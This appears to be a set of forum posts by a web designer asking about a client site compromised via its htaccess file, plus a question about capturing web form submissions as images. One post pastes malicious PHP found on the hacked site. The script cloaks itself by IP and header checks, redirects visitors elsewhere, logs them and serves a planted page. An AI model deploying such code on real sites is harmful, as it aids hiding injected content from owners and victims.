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  1. Thanks for all these responses. I am really surprised, but I suppose I shouldn't be. My client's site is also hosted by NS. This is the 2nd time their htaccess file has been hacked.
  2. No one knows where the code is from or why it suddenly appeared. The website is pure xhtml and css. I've run it off of my server and it's fine. Is this something to take up with the web hosting company? Why would anyone change the php.ini?
  3. A client's website was running fine. Suddenly the code below appears instead of their website. Caveats: it works fine on a Mac. Some PC users see the code and others do not. If you hit the refresh button, the website reappears. Has anyone seen this code before? Thanks. <? $google="http://google.com"; $checker_ip=""; $_SERVER['REMOTE_ADDR']=explode(", ",$_SERVER['HTTP_X_FORWARDED_FOR']); $_SERVER['REMOTE_ADDR']=$_SERVER['REMOTE_ADDR'][0]; // --------------------------------------------------------------------- $time=@date(DATE_RFC822); $host=$_SERVER['HTTP_X_FORWARDED_HOST']; $file= @date("Y-m-d_h"); // --------------------------------------------------------------------- // if not set HTTP_X_FORWARDED_HOST || domain name if(!$host)exit(header("Location:{$google}")); // if not set REAL IP if(!$_SERVER['HTTP_X_FORWARDED_FOR'])exit(header("Location:{$google}")); // --------------------------------------------------------------------- $IP = "{$_SERVER[REMOTE_ADDR]}.log"; function _log() { global $IP; touch (".tmp/{$IP}"); } function _check() { global $IP; if(!file_exists(".tmp/{$IP}")) return true; } if(!_check() && $_SERVER['REMOTE_ADDR'] != $checker_ip) { if(!$host)exit(header("Location:{$google}")); if(!$_SERVER['HTTP_X_FORWARDED_FOR'])exit(header("Location:{$host}")); exit(header("Location:http://{$host}")); } _log(); // --------------------------------------------------------------------- if ( strpos($host, "thedetroitbureau.com") === false) wr_file_a("logs/{$file}", $time. " > ".$host. " > " .$_SERVER[REMOTE_ADDR]. "\n"); // --------------------------------------------------------------------- echo file_get_contents( "cisco.htm" ); function wr_file_a($fname, $content) { if(strlen($content) == 0) return 0; $fpp = @fopen($fname, "a+"); if ($fpp) { @flock($fpp, LOCK_EX); @fwrite($fpp, $content); @flock($fpp, LOCK_UN); @fclose($fpp); return 1; } return 0; }
  4. Ok, thanks. I may have to find a freelancer to implement this if I get the green light. It's GREAT to know that it's possible and I appreciate your comments. I'm primarily a designer and rely heavily on PHP creation software, since time is always such an issue.
  5. Okay, so you are saying that you can add a script to the PHP form that says write to a image or PDF? Sorry, I'm a new driver! If it's not too much trouble, can you direct me to some resources for this?
  6. There is a medical office that has a detailed online patient form. When they receive the form data, it is split into 4 to 5 pages. Their online form is one detailed page. Their IT person thinks that they should be able to get their form data as a screen capture--basically a picture of the form filled in--ONE PAGE. Is this possible at all? I've never heard of this. If this is possible, is their software that does this that one can buy?
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